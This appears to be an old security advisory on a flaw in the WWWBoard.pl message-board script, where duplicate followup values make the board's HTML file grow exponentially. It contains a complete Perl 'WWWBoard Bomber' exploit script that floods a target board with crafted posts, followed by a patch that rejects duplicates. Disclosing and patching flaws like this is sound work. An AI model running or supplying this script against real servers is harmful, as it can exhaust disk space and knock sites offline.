COMMAND
WWWBoard
SYSTEMS AFFECTED
Systems running WWWBoard.pl
PROBLEM
Samuel Sparling found following. When the followup value in a
form posted to the WWWBoard script contains the same post number
twice, the script follows up to that post twice, even printing the
number of followups to a particular post (on the wwwboard.html
file) multiple times. This exploit does even one better than just
'messing up' the board, if done severly enough, it can cause the
wwwboard.html file to become hundreds of megabytes in size. It
appears that the number of followups shown on the main page (if
there's three, it'd look like "(3)") increases exponentially with
this flaw, such that posting a followup value of say "5,5,5" 2
times would make (2) appear as the followup value, but it would
appear 9 times. From the best I can tell, the number of followups
you have that are the same (like "3,3,3,3,3" would have 5) is the
number of times the followup value will appear on the
wwwboard.html page, and if you post the same twice, it does that
number to the second power, and thrice does to the third power,
etc. (whereas if you post "3,3,3,3,3" once, it'll have 5 followup
numbers, if you post it twice, it'll have 25, if you post it three
times, it'll have 125, post it ten times and it'll show 9,765,625
times, twelve times 244,140,625, thirteen times 1,220,703,125,
etc.) And even though it appears that only three bytes "(X)" are
added for each followup value you see, there are comments in the
HTML making it appear as "(<!--responses: 3-->5)" in the html
source if there's 5 followups to message 3.
As that shows, this can cause much more damage than just a simple
annoyance. This flaw could easilly be exploited to the point where
a users quota is maxed out, or even to the point where the web
server runs out of disk space. Below is an exploit script, and a
patch to fix the wwwboard.pl script. Here is an example perl
script to exploit this flaw:
#!/usr/bin/perl
###################################################
#
# WWWBoard Bomber Exploit Script
# Written By: Samuel Sparling (sparling@slip.net)
#
# Written to exploit a flaw in the WWWBoard script
# by Matt Wright.
#
# Copyright © 1998 Samuel Sparling
# All Rights Reserved.
#
# Written 11-04-1998
###################################################
use Socket;# Tell perl to use the socket module
# Change this if the server you're trying on uses a different port for http
$port=80;
print "WWWBoard Bomber Exploit Script\n\n";
print "WWWBoard.pl URL: ";
$url=<STDIN>;
chop($url) if $url =~ /\n$/;
print "Name: ";
$name=<STDIN>;
chop($name) if $name =~ /\n$/;
print "E-Mail: ";
$email=<STDIN>;
chop($email) if $email =~ /\n$/;
print "Subject: ";
$subject=<STDIN>;
chop($subject) if $subject =~ /\n$/;
print "Message: ";
$message=<STDIN>;
chop($message) if $message =~ /\n$/;
print "Followup Value: ";
$followup=<STDIN>;
chop($followup) if $followup =~ /\n$/;
print "Times to Post: ";
$stop=<STDIN>;
chop($stop) if $stop =~ /\n$/;
# Chop the URL into peices to use for the actual posting
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
$forminfo =
"name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
$forminfo =~ s/\,/\%2C/g;# Turn comas into %2C so that they can be posted.
$forminfo =~ tr/ /+/;
$length = length($forminfo);
$submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent:
Mozilla/4.01 (Win95; I)\r\nContent-type:
application/x-www-form-urlencoded\r\nContent-length:
$length\r\n\r\n$forminfo\r\n";
$i=0;
while($i < $stop)
{
&post_message;
$i++;
print "$i message(s) posted.\n";
}
sub post_message
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:
$!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
send(SOCK,$submit,0);
while(<SOCK>) {
#print $_;# Uncomment for debugging if you have problems.
}
close(SOCK);
}
exit;
SOLUTION
Below is the patch, all it does is check to make sure that the
same followup number is not used more than once in the followups
form field. In the get_variables subroutine replace this:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
}
with this:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling (sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups[$fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}